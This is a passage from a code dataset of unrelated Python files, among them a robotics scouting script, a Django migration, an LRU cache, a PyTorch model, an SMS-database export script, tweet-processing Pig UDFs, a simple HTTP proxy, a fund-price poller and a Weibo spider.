\"F\"\n if(tabletNumber == 2):\n tabBlue2[matchNum-1] = \"F\"\n if(tabletNumber == 3):\n tabBlue3[matchNum-1] = \"F\"\n elif(tabletFlagged.lower() == \"red\"):\n if(tabletNumber == 1):\n tabRed1[matchNum-1] = \"F\"\n if(tabletNumber == 2):\n tabRed2[matchNum-1] = \"F\"\n if(tabletNumber == 3):\n tabRed3[matchNum-1] = \"F\"\n else:\n print(\"Tablet color not valid!\")\n elif(userChoice == \"U\"):\n tabletFlagged = input(\"What color tablet? (Red or Blue)\\n> \")\n tabletNumber = int(input(\"What number tablet? (1, 2, or 3)\\n> \"))\n if(tabletFlagged.lower() == \"blue\"):\n if(tabletNumber == 1):\n tabBlue1[matchNum-1] = \"U\"\n if(tabletNumber == 2):\n tabBlue2[matchNum-1] = \"U\"\n if(tabletNumber == 3):\n tabBlue3[matchNum-1] = \"U\"\n elif(tabletFlagged.lower() == \"red\"):\n if(tabletNumber == 1):\n tabRed1[matchNum-1] = \"U\"\n if(tabletNumber == 2):\n tabRed2[matchNum-1] = \"U\"\n if(tabletNumber == 3):\n tabRed3[matchNum-1] = \"U\"\n else:\n print(\"Tablet color not valid!\")\n open(\"ScoutAdmin.csv\", \"w\").close()\n flaggedOutput = open(\"ScoutAdmin.csv\", \"w\")\n indexauto = 0\n flagString = \"\"\n print(tabBlue1[3])\n for x in range(len(tabBlue1)):\n flagString = flagString + \"Blue1,\" + str(x+1) + \",\" + tabBlue1[x] + \"\\n\"\n indexauto += 1\n indexauto = 0\n for x in range(len(tabBlue2)):\n flagString = flagString + \"Blue2,\" + str(x+1) + \",\" + tabBlue2[x] + \"\\n\"\n indexauto += 1\n indexauto = 0\n for x in range(len(tabBlue3)):\n flagString = flagString + \"Blue3,\" + str(x+1) + \",\" + tabBlue3[x] + \"\\n\"\n indexauto += 1\n indexauto = 0\n for x in range(len(tabRed1)):\n flagString = flagString + \"Red1,\" + str(x+1) + \",\" + tabRed1[x] + \"\\n\"\n indexauto += 1\n indexauto = 0\n for x in range(len(tabRed2)):\n flagString = flagString + \"Red2,\" + str(x+1) + \",\" + tabRed2[x] + \"\\n\"\n indexauto += 1\n indexauto = 0\n for x in range(len(tabRed3)):\n flagString = flagString + \"Red3,\" + str(x+1) + \",\" + tabRed3[x] + \"\\n\"\n indexauto += 1\n flaggedOutput.write(flagString)\n flaggedOutput.close()","sub_path":"EmptyFolder (T)/After/scoutadmin.py","file_name":"scoutadmin.py","file_ext":"py","file_size_in_byte":9055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"18364347","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sito', '0003_auto_20150515_1510'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='events',\n name='citta',\n field=models.CharField(max_length=255, null=True, verbose_name=b'Citta', blank=True),\n ),\n migrations.AddField(\n model_name='events',\n name='indirizzo',\n field=models.CharField(max_length=255, null=True, verbose_name=b'indirizzo', blank=True),\n ),\n ]\n","sub_path":"sito/migrations/0004_auto_20150515_1514.py","file_name":"0004_auto_20150515_1514.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"11962824","text":"import sys\nsys.path.append('./doubly_linked_list')\nfrom doubly_linked_list import DoublyLinkedList\n\n\nclass LRUCache:\n \"\"\"\n Our LRUCache class keeps track of the max number of nodes it\n can hold, the current number of nodes it is holding, a doubly-\n linked list that holds the key-value entries in the correct\n order, as well as a storage dict that provides fast access\n to every node stored in the cache.\n \"\"\"\n def __init__(self, limit=10):\n self.limit = limit\n # dict = {key : {key: value}} {key: value} is the node\n self.storage = DoublyLinkedList()\n self.quick_access = {}\n\n \"\"\"\n Retrieves the value associated with the given key. Also\n needs to move the key-value pair to the end of the order\n such that the pair is considered most-recently used.\n Returns the value associated with the key or None if the\n key-value pair doesn't exist in the cache.\n \"\"\"\n\n # oldest -> newest\n def get(self, key):\n \n # (key, value) has just been acessed so must be moved to the end\n if key in self.quick_access:\n self.storage.move_to_end(self.quick_access[key])\n # update the link to ensure we are pointing to the right node\n self.quick_access[key] = self.storage.tail\n\n return self.quick_access[key].value['value']\n else:\n return None\n\n \"\"\"\n Adds the given key-value pair to the cache. The newly-\n added pair should be considered the most-recently used\n entry in the cache. If the cache is already at max capacity\n before this entry is added, then the oldest entry in the\n cache needs to be removed to make room. Additionally, in the\n case that the key already exists in the cache, we simply\n want to overwrite the old value associated with the key with\n the newly-specified value.\n \"\"\"\n\n # oldest -> newest\n def set(self, key, value):\n\n if key not in self.quick_access:\n \n # if there is room\n if len(self.storage) < self.limit:\n # append it at the end\n self.storage.add_to_tail({'key': key, 'value': value})\n self.quick_access[key] = self.storage.tail\n else:\n # print('no room')\n # no room so erase the first item and append it at end\n del self.quick_access[self.storage.head.value['key']]\n\n self.storage.delete(self.storage.head)\n\n self.storage.add_to_tail({'key': key, 'value': value})\n self.quick_access[key] = self.storage.tail\n else:\n # key already exists so move it from it's old location to the end\n # while updating the value\n\n self.storage.delete(self.quick_access[key])\n\n self.storage.add_to_tail({'key': key, 'value': value})\n self.quick_access[key] = self.storage.tail\n\n def Print(self):\n print()\n print('quick access')\n {print(i, self.quick_access[i].value) for i in self.quick_access}\n print('order')\n tracker = self.storage.head\n while tracker:\n print(tracker.value)\n tracker = tracker.next","sub_path":"lru_cache/lru_cache.py","file_name":"lru_cache.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"521475508","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nimport pdb\nimport math\nimport torchvision.models as torch_models\nimport torch.nn.init as init\nfrom models.Resnet34 import resnet34\nfrom models.resnet import ResNet9\nfrom models.Selayer import SElayer\n\n\n\nclass Model(nn.Module):\n def __init__(self, pretrained=False):\n super(Model, self).__init__()\n self.img_resnet = ResNet9(pretrained)\n self.rp_resnet = ResNet9(pretrained)\n self.sum_resnet = ResNet9(pretrained)\n self.gloabl_resnet = ResNet9(num_classes=2)\n # self.gloabl_resnet = torch_models.resnet34(num_classes=2)\n # single img resnet layer\n self.img_layer0 = self.img_resnet.prep\n self.img_layer1 = self.img_resnet.layer1\n self.img_layer2 = self.img_resnet.layer2\n self.img_selayer = SElayer(256)\n self.img_layer3 = self.img_resnet.layer3\n self.img_fc = nn.Sequential(\n nn.Linear(512, 128, bias=False),\n nn.Sigmoid(),\n nn.Linear(128, 2),\n )\n # rankpooling resnet layer\n self.rp_layer0 = self.rp_resnet.prep\n self.rp_layer1 = self.rp_resnet.layer1\n self.rp_layer2 = self.rp_resnet.layer2\n self.rp_selayer = SElayer(256)\n self.rp_layer3 = self.rp_resnet.layer3\n self.rp_fc = nn.Sequential(\n nn.Linear(512, 128, bias=False),\n nn.Sigmoid(),\n nn.Linear(128, 2),\n )\n # ir resnet layer\n self.sum_layer0 = self.sum_resnet.prep\n self.sum_layer1 = self.sum_resnet.layer1\n self.sum_layer2 = self.sum_resnet.layer2\n self.sum_selayer = SElayer(256)\n self.sum_layer3 = self.sum_resnet.layer3\n self.sum_fc = nn.Sequential(\n nn.Linear(512, 128, bias=False),\n nn.Sigmoid(),\n nn.Linear(128, 2),\n )\n\n self.catConv = nn.Sequential(\n nn.Conv2d(256*2, 256, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(256),\n nn.ReLU(inplace=True),\n )\n\n self.cat_layer3 = self.gloabl_resnet.layer3\n #self.cat_layer4 = self.gloabl_resnet.layer4\n\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n # self.fc = nn.Linear(512,2)\n self.fc = nn.Sequential(\n nn.Linear(512, 128, bias=False),\n nn.Sigmoid(),\n nn.Linear(128, 2),\n )\n self._initialize_weights()\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n # if m.bias is not None:\n # m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n # m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n # m.bias.data.zero_()\n\n def forward(self, img, rank_pooling):\n '''\n img shape :[64,3,112,112]\n feat0 shape:[64,64,28,28]\n feat1 shape:[64,64,28,28]\n feat2 shape:[64,128,14,14]\n feat3 shape:[64,128,14,14]\n '''\n bs = img.shape[0]\n img_feat0 = self.img_layer0(img) # [bs,64,112,112]\n img_feat1 = self.img_layer1(img_feat0) # [bs,128,56,56]\n img_feat2 = self.img_layer2(img_feat1) # [bs,256,28,28]\n img_feat3 = self.img_selayer(img_feat2) # [bs,256,28,28]\n img_feat4 = self.img_layer3(img_feat3)\n img_pool = self.avg_pool(img_feat4).view(bs,-1) # [64,512,1,1]\n img_result = self.img_fc(img_pool)\n\n rp_feat0 = self.rp_layer0(rank_pooling)\n rp_feat1 = self.rp_layer1(rp_feat0)\n rp_feat2 = self.rp_layer2(rp_feat1)\n rp_feat3 = self.rp_selayer(rp_feat2)\n rp_feat4 = self.rp_layer3(rp_feat3)\n rp_pool = self.avg_pool(rp_feat4).view(bs,-1)\n rp_result = self.rp_fc(rp_pool)\n\n sum_feat1 = img_feat1+rp_feat1\n sum_feat2 = self.sum_layer2(sum_feat1)\n sum_feat3 = self.sum_layer3(sum_feat2)\n sum_pool = self.avg_pool(sum_feat3).view(bs,-1)\n sum_result = self.sum_fc(sum_pool)\n\n whole_pool = sum_pool+rp_pool+img_pool\n whole_result = self.fc(whole_pool)\n\n #cat_feat = torch.cat((rgb_feat3, depth_feat3, ir_feat3), 1) # [64,640,14,14]\n #cat_feat0 = self.catConv(cat_feat)#[64,128,14,14]\n #cat_feat1 = self.cat_layer3(cat_feat0) # [64,256,7,7]\n #cat_feat3 = self.avg_pool(cat_feat1) # [64,512,1,1]\n\n #cat_fc = cat_feat3.view(cat_feat3.shape[0], -1) # [64,512]\n #result = self.fc(cat_fc) # [64,2]\n\n return whole_result,img_result,rp_result,sum_result\n","sub_path":"models/single_sdnet.py","file_name":"single_sdnet.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"616734354","text":"import sys\nimport sqlite3\nimport os\nimport json\nimport datetime\nimport urllib\n\nfrom scripts import dbm\nfrom scripts.os_check import SEP\nfrom scripts.utils import ROOT_DIR, mkdir\nOUTPUT = ROOT_DIR\n''' location of databases '''\nsmsdb = ''\n\n\ndef store_sms_messages():\n if os.path.isfile(smsdb):\n sms_conn = sqlite3.connect(smsdb)\n else:\n print(\"smsdb does not exist\")\n return\n\n sms_cursor = sms_conn.cursor()\n sms_query = \"select _id, name, snippet_text, sort_timestamp from conversations order by name, sort_timestamp desc;\"\n sms_cursor.execute(sms_query)\n\n SMS_ID_COL_INDX = 0\n SMS_NAME_COL_INDX = 1\n SMS_SNIPPET_TEXT_COL_INDX = 2\n SMS_SORT_TIMESTAMP_COL_INDX = 3\n\n sms_dict = {}\n\n row = sms_cursor.fetchone()\n while row:\n _id = \" \"\n name = \" \"\n text = \" \"\n timestamp = \" \"\n\n if row[SMS_ID_COL_INDX]:\n _id = row[SMS_ID_COL_INDX]\n\n if row[SMS_NAME_COL_INDX]:\n name = row[SMS_NAME_COL_INDX]\n\n if row[SMS_SNIPPET_TEXT_COL_INDX]:\n text = str(row[SMS_SNIPPET_TEXT_COL_INDX])\n text = text.replace(\"\\r\\n\", \" \")\n text = text.replace(\"\\n\", \" \")\n\n if row[SMS_SORT_TIMESTAMP_COL_INDX]:\n timestamp = row[SMS_SORT_TIMESTAMP_COL_INDX]\n\n sms_dict[row[0]] = (_id, name, text, timestamp)\n\n row = sms_cursor.fetchone()\n\n sms_cursor.close()\n sms_conn.close()\n sms_output_file = OUTPUT + SEP + \"sms.tsv\"\n sms_file = open(sms_output_file, \"w+\", encoding=\"utf-8\")\n sms_file.write(\"name\\ttext\\tsort_timestamp\\n\")\n\n for value in sms_dict:\n\n if sms_dict[value][SMS_SORT_TIMESTAMP_COL_INDX] > 0:\n datetimestr = datetime.datetime.fromtimestamp(\n sms_dict[value][SMS_SORT_TIMESTAMP_COL_INDX] / 1000).strftime('%Y-%m-%dT%H:%M:%S')\n else:\n datetimestr = str(\n sms_dict[value][SMS_SORT_TIMESTAMP_COL_INDX])\n\n sms_file.write(sms_dict[value][SMS_NAME_COL_INDX] + \\\n \"\\t\" + sms_dict[value][SMS_SNIPPET_TEXT_COL_INDX] + \\\n \"\\t\" + datetimestr + \"\\n\")\n print(\"\\n\" + str(len(sms_dict.values())) + \" sms were processed\")\n\n\ndef store_sms_data(session_name):\n global smsdb\n global OUTPUT\n OUTPUT = OUTPUT + SEP + 'data' + SEP + session_name\n smsdb = OUTPUT + SEP + 'db/sms.db'\n OUTPUT = OUTPUT + SEP + 'tsv'\n mkdir(OUTPUT)\n store_sms_messages()\n","sub_path":"scripts/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"63136917","text":"import re\nimport csv\nimport sys\nimport datetime\n\n'''\nThis file contains a number of functions that can be called as user-defined\nfunctions in a Pig script, simplifiying much of the logic to do these tasks. \nUnfortunately, many of the functions here seem to execute very slow, and it\nmight be worth looking into alternative ways of processing HBase rows, such\nas using Spark.\n@author Mitch Wagner\n'''\n\n@outputSchema(\"text:chararray\")\ndef getHashtags(text):\n '''\n Extracts the hashtags from the tweet text passed to the function, and\n concatenates all of them with semi-colons.\n '''\n if (text == None):\n return \"\"\n return ';'.join(str(elem) for elem in re.findall(\"(?:\\s|\\A^)[#]+([A-Za-z0-9-_]+)\", text))\n\n@outputSchema(\"text:chararray\")\ndef getMentions(text):\n '''\n Extracts the mentions from the tweet text passed to the function, and\n concatenates all of them with semi-colons.\n '''\n if (text == None):\n return \"\"\n return ';'.join(str(elem) for elem in re.findall(\"(?:\\s|\\A^)[@]+([A-Za-z0-9-_]+)\", text))\n\n@outputSchema(\"text:chararray\")\ndef getRetweetStatus(text):\n '''\n Determines whether or not the tweet whose text was passed to this function\n is a retweet, using a regex to look for the telltale presence of the term\n \"RT\" that indicates this.\n '''\n if (text == None):\n return \"\"\n l = re.findall(\"(?:^|\\s)(RT)[@]?\", text, flags=re.IGNORECASE)\n if len(l) > 0:\n return \"1\"\n else:\n return \"0\"\n\n@outputSchema(\"month:chararray\")\ndef getCreatedMonth(unixtime):\n '''\n Takes in a Unix timestamp, and determines the month that said timestamp\n refers to, returning that value.\n '''\n if (unixtime == None):\n return \"\"\n return datetime.datetime.fromtimestamp(int(unixtime)).strftime(\"%m\")\n\n@outputSchema(\"year:chararray\")\ndef getCreatedYear(unixtime):\n '''\n Takes in a Unix timestamp, and determines the year that said timestamp\n refers to, returning that value. \n '''\n if (unixtime == None):\n return \"\"\n return datetime.datetime.fromtimestamp(int(unixtime)).strftime(\"%Y\")\n\n@outputSchema(\"text:chararray\")\ndef removeAtSymbols(text):\n '''\n Removes @ symbols from the text passed to the function, and returns the\n augmented text.\n '''\n if (text == None):\n return \"\"\n return text.replace(\"@\", \"\")\n\n@outputSchema(\"text:chararray\")\ndef removeOctothorpes(text):\n ''' \n Removes octothoropes from the text passed to the function, and returns the\n augmented text. \n '''\n if (text == None):\n return \"\"\n return text.replace(\"#\", \"\")\n\n@outputSchema(\"text:chararray\")\ndef removeBadWords(text):\n '''\n Removes a number of bad words from the text passed to the function,\n returning the augmented text There are likely several words that could be \n added to this list. When adding new words, one must be mindful that\n those words are not subwords of words that are actually appropriate.\n For example, the word 'ass' is actually a subtoken of 'morass', which\n is a perfectly acceptable word, and we are not taking that into \n account here.\n '''\n if (text == None):\n return \"\"\n text = text.replace(\"damn\", \"d**m\")\n text = text.replace(\"bitch\", \"b***h\")\n text = text.replace(\"crap\", \"c**p\")\n text = text.replace(\"piss\", \"p**s\")\n text = text.replace(\"dick\", \"d**k\")\n text = text.replace(\"cunt\", \"c**t\")\n text = text.replace(\"slut\", \"sl*t\")\n text = text.replace(\"shit\", \"sh*t\")\n text = text.replace(\"pussy\", \"p***y\")\n text = text.replace(\"fuck\", \"f**k\")\n text = text.replace(\"ass\", \"a**\")\n return text\n \n@outputSchema(\"text:chararray\")\ndef removeStopWords(text):\n '''\n Removes a number of English stopwords from the text, as given by the\n following resource: http://xpo6.com/list-of-english-stop-words/ \n\n Unlike with the bad words above, we went to the trouble of ensuring that\n only words that exactly match these tokens are replaced, given that\n many of these words are components of larger, more important words.\n Unfortunately, this is a very slow process, likely due to several\n regex replacements, and would be a key target for optimizations.\n '''\n if (text == None):\n return \"\"\n stopwords = [\"a\", \"about\", \"above\", \"above\", \"across\", \"after\",\n \"afterwards\", \"again\", \"against\", \"all\", \"almost\", \"alone\", \"along\", \"already\",\n \"also\",\"although\",\"always\",\"am\",\"among\", \"amongst\", \"amoungst\", \"amount\",\n \"an\", \"and\", \"another\", \"any\",\"anyhow\",\"anyone\",\"anything\",\"anyway\",\n \"anywhere\", \"are\", \"around\", \"as\", \"at\", \"back\",\"be\",\"became\",\n \"because\",\"become\",\"becomes\", \"becoming\", \"been\", \"before\", \"beforehand\",\n \"behind\", \"being\", \"below\", \"beside\", \"besides\", \"between\", \"beyond\", \"bill\",\n \"both\", \"bottom\",\"but\", \"by\", \"call\", \"can\", \"cannot\", \"cant\", \"co\", \"con\",\n \"could\", \"couldnt\", \"cry\", \"de\", \"describe\", \"detail\", \"do\", \"done\", \"down\",\n \"due\", \"during\", \"each\", \"eg\", \"eight\", \"either\", \"eleven\",\"else\", \"elsewhere\",\n \"empty\", \"enough\", \"etc\", \"even\", \"ever\", \"every\", \"everyone\", \"everything\",\n \"everywhere\", \"except\", \"few\", \"fifteen\", \"fify\", \"fill\", \"find\", \"fire\",\n \"first\", \"five\", \"for\", \"former\", \"formerly\", \"forty\", \"found\", \"four\", \"from\",\n \"front\", \"full\", \"further\", \"get\", \"give\", \"go\", \"had\", \"has\", \"hasnt\", \"have\",\n \"he\", \"hence\", \"her\", \"here\", \"hereafter\", \"hereby\", \"herein\", \"hereupon\",\n \"hers\", \"herself\", \"him\", \"himself\", \"his\", \"how\", \"however\", \"hundred\", \"ie\",\n \"if\", \"in\", \"inc\", \"indeed\", \"interest\", \"into\", \"is\", \"it\", \"its\", \"itself\",\n \"keep\", \"last\", \"latter\", \"latterly\", \"least\", \"less\", \"ltd\", \"made\", \"many\",\n \"may\", \"me\", \"meanwhile\", \"might\", \"mill\", \"mine\", \"more\", \"moreover\", \"most\",\n \"mostly\", \"move\", \"much\", \"must\", \"my\", \"myself\", \"name\", \"namely\", \"neither\",\n \"never\", \"nevertheless\", \"next\", \"nine\", \"no\", \"nobody\", \"none\", \"noone\",\n \"nor\", \"not\", \"nothing\", \"now\", \"nowhere\", \"of\", \"off\", \"often\", \"on\", \"once\",\n \"one\", \"only\", \"onto\", \"or\", \"other\", \"others\", \"otherwise\", \"our\", \"ours\",\n \"ourselves\", \"out\", \"over\", \"own\",\"part\", \"per\", \"perhaps\", \"please\", \"put\",\n \"rather\", \"re\", \"same\", \"see\", \"seem\", \"seemed\", \"seeming\", \"seems\", \"serious\",\n \"several\", \"she\", \"should\", \"show\", \"side\", \"since\", \"sincere\", \"six\", \"sixty\",\n \"so\", \"some\", \"somehow\", \"someone\", \"something\", \"sometime\", \"sometimes\",\n \"somewhere\", \"still\", \"such\", \"system\", \"take\", \"ten\", \"than\", \"that\", \"the\",\n \"their\", \"them\", \"themselves\", \"then\", \"thence\", \"there\", \"thereafter\",\n \"thereby\", \"therefore\", \"therein\", \"thereupon\", \"these\", \"they\", \"thickv\",\n \"thin\", \"third\", \"this\", \"those\", \"though\", \"three\", \"through\", \"throughout\",\n \"thru\", \"thus\", \"to\", \"together\", \"too\", \"top\", \"toward\", \"towards\", \"twelve\",\n \"twenty\", \"two\", \"un\", \"under\", \"until\", \"up\", \"upon\", \"us\", \"very\", \"via\",\n \"was\", \"we\", \"well\", \"were\", \"what\", \"whatever\", \"when\", \"whence\", \"whenever\",\n \"where\", \"whereafter\", \"whereas\", \"whereby\", \"wherein\", \"whereupon\",\n \"wherever\", \"whether\", \"which\", \"while\", \"whither\", \"who\", \"whoever\", \"whole\",\n \"whom\", \"whose\", \"why\", \"will\", \"with\", \"within\", \"without\", \"would\", \"yet\",\n \"you\", \"your\", \"yours\", \"yourself\", \"yourselves\", \"the\"]\n\n for word in stopwords:\n rgx = re.compile(r\"\\b\" + word + r\"\\b\")\n text = rgx.sub(\"\", text)\n \n return text \n\n\n \n","sub_path":"tweet-processing/pipeline/process-pig.py","file_name":"process-pig.py","file_ext":"py","file_size_in_byte":7435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"619454240","text":"from ProxyBoyLogger import ProxyBoyLogger\nfrom http import HTTPStatus\nfrom http.server import BaseHTTPRequestHandler\nfrom urllib.parse import urlparse\nimport errno\nimport socket\n\nclass ProxyBoyBase(BaseHTTPRequestHandler):\n def __init__(self, request, client_address, server, LoggerClass=ProxyBoyLogger):\n self.logger = LoggerClass( self )\n self._headers_buffer = [] # Needed to not error out. Did I accidentally delete the headers buffer?\n self._general_header_exclude = [\n ('Connection', 'keep-alive'),\n ('Proxy-Connection', 'keep-alive'),\n ]\n self._response_header_exclude = [\n 'Server',\n 'Date',\n 'Transfer-Encoding'\n ]\n super(ProxyBoyBase, self).__init__(request, client_address, server)\n\n def clear_headers_buffer(self):\n \"\"\"\n Clears the headers buffer in this request handler in a way that doesn't write out to our wfile\n \"\"\"\n self._headers_buffer = []\n return\n\n def do_PROXY(self):\n \"\"\"\n Performed on requests in which we want to read information\n \"\"\"\n pass\n\n def do_CONNECT(self):\n \"\"\"\n Performed on requests in which we respect tunneling protocol\n \"\"\"\n pass\n\n def log_message(self, format, *args):\n self.logger.log_proxy_boy_message( format, *args )\n return\n\n def log_error(self, format, *args):\n self.logger.log_proxy_boy_message( format, *args, title=\"ERROR\")\n\n def log_request(self, code='-', size='-', requestline=None):\n \"\"\"Log an accepted request.\n\n This is called by send_response().\n\n \"\"\"\n if isinstance(code, HTTPStatus):\n code = code.value\n\n if not requestline:\n requestline = self.requestline\n\n self.logger.log_proxy_boy_request('\"%s\" %s %s', requestline, str(code), str(size))\n return\n\n def log_response(self, headers):\n self.logger.log_proxy_boy_request('''\n\n''',\n )\n\n def get_a_port(self, parsed_url):\n \"\"\"Returns a port that is either the default, or a port given in a urlparse() string.\n \"\"\"\n port = parsed_url.port\n\n # Search through to find a port string\n if not port:\n port = parsed_url.path.split(':')[-1:][0]\n\n if not port or (port == parsed_url.path):\n port = 80\n\n return port\n\n def get_client_url(self):\n \"\"\"Builds and sanitizes the client url string so that we can use it\n in subsequent requests.\n \"\"\"\n client_host=self.requestline.split(\" \")[1]\n ssl = False\n parsed_url = urlparse(client_host, 'http')\n port = self.get_a_port(parsed_url)\n\n if port == '443':\n ssl = True\n\n print(\"PARSED URL\")\n print(parsed_url)\n\n if not parsed_url.netloc:\n sanitized_url = \":\".join(parsed_url.path.split(':')[:-1])\n\n if not sanitized_url:\n sanitized_url = parsed_url.path\n\n if ssl:\n parsed_url = parsed_url._replace(scheme='https')\n parsed_url = parsed_url._replace(netloc=f\"{sanitized_url}:{port}\")\n parsed_url = parsed_url._replace(path=\"\")\n return parsed_url.geturl()\n\n def handle_one_request(self):\n \"\"\"Handle a single HTTP request.\n You normally don't need to override this method; see the class\n __doc__ string for information on how to handle specific HTTP\n commands such as GET and POST.\n \"\"\"\n try:\n self.raw_requestline = self.rfile.readline(65537)\n if len(self.raw_requestline) > 65536:\n self.requestline = ''\n self.request_version = ''\n self.command = ''\n self.send_error(HTTPStatus.REQUEST_URI_TOO_LONG)\n return\n if not self.raw_requestline:\n self.close_connection = True\n return\n if not self.parse_request():\n # An error code has been sent, just exit\n return\n if self.command == \"CONNECT\":\n self.do_CONNECT()\n else:\n self.do_PROXY()\n # Do a proxy. With ProxyBoy.\n self.wfile.flush() #actually send the response if not already done.\n except socket.timeout as e:\n #a read or a write timed out. Discard this connection\n self.log_error(\"Request timed out: %r\", e)\n self.close_connection = True\n return\n except IOError as e:\n if e.errno == errno.EPIPE:\n self.log_error(\"Pipe broken: Trying to perform operations on a closed connection\")","sub_path":"ProxyBoyBase.py","file_name":"ProxyBoyBase.py","file_ext":"py","file_size_in_byte":4732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"615977828","text":"#Functions\nimport record\nimport pandas as pd\nimport pyttsx3\neng = pyttsx3.init()\neng.say(\"This is the Funtions module\")\neng.runAndWait()\nimport_file_path=\"functions.xlsx\"\nvoice_input=record.recorder().lower()\nprint(voice_input)\ndf=pd.read_excel(import_file_path)\nprint(df)\nvariable_commands_list=df['function_Declaration'].tolist()\nprint(type(variable_commands_list[0]))\nfor element in variable_commands_list:\n ele=element.lower()\n print(\"Function command detected\")\n if \"function\" in ele:\n if \"define a function\" in voice_input:\n print(voice_input[19:])\n input_list=voice_input.split()\n function_ind=input_list.index(\"function\")\n type_ind=input_list.index(\"type\")\n function_name=input_list[type_ind+1]+\" \"+input_list[function_ind+1]\n print(\"function command detected\")\n else:\n print(\"Nothing related to function\")\nprint(\"Code Block: \")\nprint(function_name)\n\n","sub_path":"functionscpp.py","file_name":"functionscpp.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"312789363","text":"#!winpty python\n#-*- coding: utf-8 -*\n\nclass Unbuffered(object):\n def __init__(self, stream):\n self.stream = stream\n def write(self, data):\n self.stream.write(data)\n self.stream.flush()\n def writelines(self, datas):\n self.stream.writelines(datas)\n self.stream.flush()\n def __getattr__(self, attr):\n return getattr(self.stream, attr)\n\nfrom datetime import datetime, timedelta\nimport sys, os, http.client, json, time, winsound\n\nsys.stdout = Unbuffered(sys.stdout)\n\nto_date = datetime.today()\nfrom_date = to_date - timedelta(days=14) # 14 days back is long enough for long public holidays close.\n\nfund_conn = http.client.HTTPConnection('www.fullgoal.com.cn', timeout=5)\n\nwhile True:\n try:\n fund_conn.request(\"GET\", \"/chart-web/chart/fundnetchart!getFundNetChartJson\"\n \"?fundcode=001510&from=%s&to=%s&charttype=2&show=1\"\n \"&titleflag=1&siteId=ea9e215cce3342d3b40721461cd1572d\"\n % (from_date.strftime('%Y-%m-%d'), to_date.strftime('%Y-%m-%d')))\n resp_c = json.loads(fund_conn.getresponse().read())\n\n # if the last net value is today's (within 1 day), it means we get the update.\n if timedelta(days=1) > (to_date - datetime.strptime(resp_c['xAxisData'][-1], '%Y-%m-%d')):\n print('\\n>>> Eureka! <<<')\n fund_conn.request(\"GET\", \"/chart-web/chart/fundnetchart!getFundNetChartJson\"\n \"?fundcode=001508&from=%s&to=%s&charttype=2&show=1\"\n \"&titleflag=1&siteId=ea9e215cce3342d3b40721461cd1572d\"\n % (from_date.strftime('%Y-%m-%d'), to_date.strftime('%Y-%m-%d')))\n resp_a = json.loads(fund_conn.getresponse().read())\n break\n #else:\n #print(resp_c)\n\n print('.', end='')\n time.sleep(60)\n except http.client.RemoteDisconnected:\n print('_', end='')\n time.sleep(120)\n\nvalue_today = float(resp_a['seriesData0'][-1])\nvalue_yestoday = float(resp_a['seriesData0'][-2])\ndaily_adjustment = (value_today - value_yestoday) / value_yestoday * 100\nprint(\"[%s] %.4f -> %.4f 富国新动力A -> 日涨跌: %.4f%%\"\n % (datetime.today(), value_yestoday, value_today, daily_adjustment))\n\nvalue_today = float(resp_c['seriesData0'][-1])\nvalue_yestoday = float(resp_c['seriesData0'][-2])\ndaily_adjustment = (value_today - value_yestoday) / value_yestoday * 100\nprint(\"[%s] %.4f -> %.4f 富国新动力C -> 日涨跌: %.4f%%\"\n % (datetime.today(), value_yestoday, value_today, daily_adjustment))\n\nwinsound.MessageBeep()\n","sub_path":"daily_fund_report.py","file_name":"daily_fund_report.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"271341845","text":"from pyspider.libs.base_handler import *\nimport codecs\nimport logging\nimport json\n\nclass Handler(BaseHandler):\n crawl_config = {\n }\n\n logging.basicConfig(level = logging.INFO)\n\n #client = KafkaClient(hosts = \"192.168.0.101:9092\",zookeeper_hosts=\"192.168.0.101:2181\")\n\n #生产kafka数据,通过字符串形式\n #def produce_kafka_data(kafka_topic,result):\n #with kafka_topic.get_producer(delivery_reports=True) as producer:\n #type(json.dump(result))\n #producer.produce(json.dump(result))\n\n def on_result(self, result):\n topic = self.client.topics[\"gakki\"]\n print(result)\n # self.produce_kafka_data(topic,result)\n #存入mongoDb\n\n #@every(minutes=24 * 60)\n def on_start(self):\n for x in range(1, 5):\n self.crawl('https://m.weibo.cn/api/container/getIndex?containerid=1076031882811994&page=%d' % x, callback=self.json_parser,validate_cert=False\n )\n\n def json_parser(self, response):\n return [{ \"card\": x\n } for x in response.json['data']['cards']]\n\n","sub_path":"GakkiSimle/WeiBoSpider_pyspider.py","file_name":"WeiBoSpider_pyspider.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"196228848","text":"import os\nimport time\nimport subprocess\nfrom threading import Lock, Thread\nimport logging\nfrom collections import 